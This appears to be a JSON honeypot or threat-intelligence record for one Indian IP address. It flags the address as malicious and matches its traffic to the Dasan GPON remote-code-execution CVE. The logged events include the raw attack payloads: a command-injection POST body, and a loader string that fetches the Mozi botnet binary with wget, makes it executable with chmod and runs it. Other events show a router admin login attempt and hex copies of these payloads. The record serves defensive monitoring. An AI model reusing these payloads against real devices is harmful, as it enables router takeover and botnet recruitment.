{"ip":"103.176.16.73","total_events":4,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"2 loader / command-injection payload(s)","confidence":"medium","network_type":"residential ISP","why":["2 request(s) carried a loader or command-injection payload (wget, curl, tftp, busybox, chmod or a known bot name).","This is the same evidence that puts an address in the public exploiter feed, so the feed and this page now agree.","Payload evidence stands on its own: one request that fetches a botnet binary is exploitation, not probing.","Not in any known-scanner range."],"engagement":{"level":"request","label":"Request traffic","detail":"325 bytes sent","bytes_sent":325,"session_seconds":0,"persistent":false}},"first_seen":"2026-04-13T17:52:48","last_seen":"2026-09-17T03:19:13","events_24h":0,"events_7d":0,"geo":{"country_code":"IN","country_name":"India","region":"","city":"","lat":21.9974,"lon":79.0011,"asn":135687,"org":"Qwistel Network Service Private Limited"},"source_domain":null,"known_scanners":[],"scanner_tag":{"key":"peeringdb:as135687","label":"Qwistel Network Service","category":"isp","url":"https://www.peeringdb.com/asn/135687"},"cve_matches":[{"cve_id":"CVE-2018-10562","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form"}],"malware":[],"top_ports":[{"port":8080,"proto":"tcp","label":"HTTP-alt","count":4}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_client_hello":"","tls_ja3":[],"http_akin":["b11cuq060_00040817_a9482ae2"]},"fingerprint_peers":{"b11cuq060_00040817_a9482ae2":69},"akin_families":{},"user_agents":["Hello, World"],"timeline":[{"date":"2026-09-17","count":1}],"recent_events":[{"timestamp":"2026-09-17T03:19:13","port":8080,"proto":"tcp","app_proto":"","app_protocol":"http","host":"127.0.0.1","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"118\",\"host\":\"127.0.0.1:8080\",\"user-agent\":\"Hello, World\"}","body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://103.176.16.73:35431/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/GponForm/diag_Form?images/","summary":"","payload_hex":"504f5354202f47706f6e466f726d2f646961675f466f726d3f696d616765732f20485454502f312e310d0a486f73743a203132372e302e302e313a383038300d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570743a202a2f2a0d0a557365722d4167656e743a2048656c6c6f2c20576f726c640d0a436f6e74656e742d4c656e6774683a203131380d0a0d0a58576562506167654e616d653d6469616726646961675f616374696f6e3d70696e672677616e5f636f6e6c6973743d3026646573745f686f73743d60603b776765742b687474703a2f2f3130332e3137362e31362e37333a33353433312f4d6f7a692e6d2b2d4f2b2d3e2f746d702f67706f6e383038303b73682b2f746d702f67706f6e38303830266970763d30","method":"POST","user_agent":"Hello, World","ja3":"","session":"6ded78ce-ddb2-43b0-814e-39dee47fbee5","seq":1,"duration_ms":101,"bytes_in":325,"bytes_out":78},{"timestamp":"2026-04-13T17:52:48","port":8080,"proto":"tcp","app_proto":"","app_protocol":"ookla","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/tmp/Netlink.m&waninf=1_INTERNET_R_VID_154 HTTP/1.0\r\n\r\n","payload_hex":"3230687474703a2f2f25733a25642f4d6f7a692e6d2532302d4f2532302d3e2532302f746d702f4e65746c696e6b2e6d3b63686d6f642532303737372532302f746d702f4e65746c696e6b2e6d3b2f746d702f4e65746c696e6b2e6d2677616e696e663d315f494e5445524e45545f525f5649445f31353420485454502f312e300d0a0d0a","method":"","user_agent":"","ja3":"","session":"2bea5007-3500-4fa2-81a1-95ca74a52bbd","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0,"enriched":{"digest":"69dda84fbae568b6","strings":["20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/t…"],"iocs":{"urls":["http://%s:%d/Mozi.m%20-O%20-"],"paths":["/tmp/Netlink.m"]}}},{"timestamp":"2026-04-13T17:52:48","port":8080,"proto":"tcp","app_proto":"","app_protocol":"ookla","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"ET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0\r\n\r\n","payload_hex":"4554202f626f61666f726d2f61646d696e2f666f726d4c6f67696e3f757365726e616d653d656338267073643d65633820485454502f312e300d0a0d0a","method":"","user_agent":"","ja3":"","session":"2bea5007-3500-4fa2-81a1-95ca74a52bbd","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0,"enriched":{"digest":"13b4e200dec7726e","strings":["ET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0"],"iocs":{"paths":["/boaform/admin/formLogin"]}}},{"timestamp":"2026-04-13T17:52:48","port":8080,"proto":"tcp","app_proto":"","app_protocol":"ookla","host":"","headers":"","body":"","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"","summary":"G","payload_hex":"47","method":"","user_agent":"","ja3":"","session":"2bea5007-3500-4fa2-81a1-95ca74a52bbd","seq":0,"duration_ms":0,"bytes_in":0,"bytes_out":0}],"http_methods":[{"method":"POST","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/GponForm/diag_Form?images/","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[{"value":"127.0.0.1","count":1}],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Connection","Content-Length","Host","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"118","notable":false},{"name":"Host","value":"127.0.0.1:8080","notable":false},{"name":"User-Agent","value":"Hello, World","notable":false}],"distinct_sets":1,"events_with_headers":1},"tags":[{"tag_id":"CVE-2018-10562","tag_type":"cve","title":"Dasan GPON Devices - Remote Code Execution","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/GponForm/diag_Form","reference_urls":["https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router","https://github.com/f3d0x0/GPON/blob/master/gpon_rce.py","https://nvd.nist.gov/vuln/detail/CVE-2018-10562","https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/","https://github.com/ethicalhackeragnidhra/GPON"]}],"data_as_of":"2026-09-30T16:01:23.271590+00:00"}